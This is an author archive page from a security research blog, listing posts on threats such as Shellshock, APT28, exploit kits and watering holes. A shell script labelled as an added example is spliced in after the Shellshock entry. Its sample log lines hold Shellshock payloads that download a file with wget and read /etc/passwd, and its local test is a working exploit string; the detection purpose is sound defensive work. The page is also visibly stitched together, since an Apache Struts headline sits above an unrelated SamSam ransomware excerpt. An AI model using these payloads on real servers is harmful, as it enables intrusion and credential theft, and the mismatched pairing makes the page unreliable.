Hunting for Linux library injection with Osquery

June 20, 2019 | Jaime Blasco
Jaime Blasco

Vice President and Chief Scientist

Jaime Blasco is a renowned security researcher with broad experience in network security, malware analysis and incident response. At AT&T Cybersecurity, Jaime leads the Alien Labs Intelligence and Research team, which researches threats and integrates threat intelligence into detection mechanisms. Prior to working at AT&T, Jaime was Chief Scientist at AlienVault. Before that, he founded two startups (Eazel, Aitsec) working on web application security, source code analysis and incident response. He is based in San Francisco. Jaime's work on emerging threats and targeted attacks is frequently cited in international publications such as The New York Times, BBC, The Washington Post and Al Jazeera.


When analyzing malware and adversary activity in Windows environments, DLL injection techniques are commonly used, and there are plenty of resources on how to detect these activities. When it comes to Linux, this is less commonly seen in the wild. I recently came across a great blog from TrustedSec that describes a few techniques and tools that can be used…

May 4, 2017 | Jaime Blasco

OAuth Worm Targeting Google Users - You Need to Watch Cloud Services

Yesterday, many people received an e-mail from someone they knew and trusted asking them to open a "Google Doc." The email looked, felt, and smelled like the real thing: the email that Google normally sends whenever a share request is made. However, the email contained a button that mimicked a link to open a document in Google Docs. When users…

March 14, 2017 | Jaime Blasco

Apache Struts Vulnerability Being Exploited by Attackers

Normally new variants of ransomware families aren't particularly interesting. SamSam, however, is different. Whereas most ransomware is automatically propagated, SamSam is deployed manually. In addition, the group behind SamSam charges very high ransoms because of the amount of effort invested in their operations, which made them the subject of two FBI Alerts last year. The attacks seem to peak…

March 9, 2017 | Jaime Blasco

11 Simple Yet Important Tips to Secure AWS

This is the first in a series of blogs dedicated to Amazon Web Services (AWS) security monitoring and best practices. AWS Security Best Practices As more and more organizations of all sizes are moving applications and workloads to the public cloud, it is critical to understand the security challenges of the cloud in general, and AWS in particular. IT environments…

February 24, 2016 | Jaime Blasco

Operation BlockBuster unveils the actors behind the Sony attacks

Today, a coordinated coalition involving AlienVault and several other security companies led by Novetta is announcing Operation BlockBuster. This industry initiative was created to share information and potentially disrupt the infrastructure and tools from an actor named the Lazarus Group. The Lazarus Group has been responsible for several operations since at least 2009, including the attack that affected Sony Pictures Entertainment…

July 28, 2015 | Jaime Blasco

Open Threat Exchange (OTX) - Now Including Social Sharing of Threat Data

The threat landscape is constantly evolving and it is even more of a challenge for organizations, especially those in the mid-market, to detect where the true threats lie without tapping into a broader and often already stretched IT Budget. To help solve this problem, AlienVault developed a free platform called Open Threat Exchange (OTX) to help organizations gain greater visibility…

June 11, 2015 | Jaime Blasco

Watering holes exploiting JSONP hijacking to track users in China

By: Eddie Lee and Jaime Blasco. Imagine if an authoritarian state had a tool to get private information about users visiting certain websites, including real names, mail addresses, sex, birthdays, phone numbers, etc. Imagine that even users that run Tor or VPN connections to bypass the tools that the authoritarian government uses to block and monitor these websites were…

October 28, 2014 | Jaime Blasco

From Russia with love: Sofacy/Sednit/APT28 is in town

Yesterday, another cyber espionage group with Russian roots made it to the New York Times headlines again, courtesy of FireEye and a new report they published. FireEye did a pretty good job on attribution and gave some technical indicators; however, they neglected to reference previous work on this threat actor from companies like PwC, Trend Micro, ESET and others. We have…

September 25, 2014 | Jaime Blasco

Attackers exploiting Shellshock (CVE-2014-6271) in the wild

Yesterday, a new vulnerability affecting Bash (CVE-2014-6271) was published. It allows attackers to execute arbitrary commands by supplying an environment variable whose value is crafted in a specific format (an exported function definition with commands appended after it). It affects Bash (the Bourne Again SHell), the default command shell for Linux and other UNIX flavors including Mac OS X. The vulnerability is critical since it can be exposed on web servers…
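As an added example (not code from the original post), the two checks a responder wanted on the day CVE-2014-6271 was published: a local test of whether the installed bash still executes the trailing commands of an exported function definition, and a hunt over web server access logs for the `() {` prefix that a CGI server would copy into an environment variable. The log lines are constructed samples in Apache combined format using documentation IP ranges, not real traffic, and the function names are this example's own.

```shell
#!/bin/sh
# Added example for CVE-2014-6271 (Shellshock); not from the original post.

# 1) Local check. Pre-patch bash kept parsing an exported function definition
#    past the closing brace, so "echo vulnerable" runs when the child shell
#    starts. Returns 0 if bash is vulnerable, 1 if patched (or bash is absent).
shellshock_local_check() {
    out=$(env x='() { :;}; echo vulnerable' bash -c 'echo test' 2>/dev/null)
    case "$out" in
        *vulnerable*) echo "bash is VULNERABLE to CVE-2014-6271"; return 0 ;;
        *)            echo "bash is not vulnerable (or not installed)"; return 1 ;;
    esac
}

# 2) Log hunt. A CGI server exports request headers (User-Agent, Referer, ...)
#    as environment variables, so attackers place the function-definition
#    prefix in a header. Bash only recognizes values that start with exactly
#    "() {", so that is the pattern to look for.
# Constructed sample access log lines (not real traffic):
SAMPLE_LOG='203.0.113.10 - - [25/Sep/2014:10:01:02 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :;}; /bin/bash -c \"wget http://198.51.100.5/x -O /tmp/x\""
198.51.100.7 - - [25/Sep/2014:10:01:05 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
203.0.113.11 - - [25/Sep/2014:10:02:11 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 12 "() { :;}; echo; /bin/cat /etc/passwd" "curl/7.37.0"'

# Print every line carrying the Shellshock prefix; exit status 0 if any matched.
# Takes the log text as its argument so it can be fed from a file with "$(cat file)".
shellshock_log_hunt() {
    printf '%s\n' "$1" | grep -E '\(\) \{'
}

# Number of matching lines, handy for an alerting threshold.
shellshock_log_count() {
    shellshock_log_hunt "$1" | wc -l | tr -d ' '
}

# Usage when run directly:
shellshock_local_check || :
echo "exploitation attempts in sample log: $(shellshock_log_count "$SAMPLE_LOG")"
shellshock_log_hunt "$SAMPLE_LOG" || :
```

Run the hunt against a real log with `shellshock_log_hunt "$(cat /var/log/apache2/access.log)"`; the pattern also works as a grep over proxy or WAF logs, since the only requirement is that the header value reaches a bash-backed CGI process unchanged.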

September 15, 2014 | Jaime Blasco

Archie: Just another Exploit kit

We have previously described how Exploit Kits are some of the favorite techniques used by cybercriminals to install malicious software on victims' systems. The number of Exploit Kits available has experienced exponential growth in the last few years. Since Blackhole’s author was arrested in 2013, the number of Exploit Kits has increased - including Neutrino, Magnitude, Nuclear, Rig and…

August 28, 2014 | Jaime Blasco

Scanbox: A Reconnaissance Framework Used with Watering Hole Attacks

A few days ago we detected a watering hole campaign in a website owned by one big industrial company. The website is related to software used for simulation and system engineering in a wide range of industries, including automotive, aerospace, and manufacturing. The attackers were able to compromise the website and include code that loaded a…

July 25, 2014 | Jaime Blasco

Attackers abusing Internet Explorer to enumerate software and detect security products

During the last few years we have seen an increase in the number of malicious actors using tricks and browser vulnerabilities to enumerate the software that is running on the victim's system using Internet Explorer. In this blog post we will describe some of the techniques that attackers are using to perform reconnaissance that gives them information for…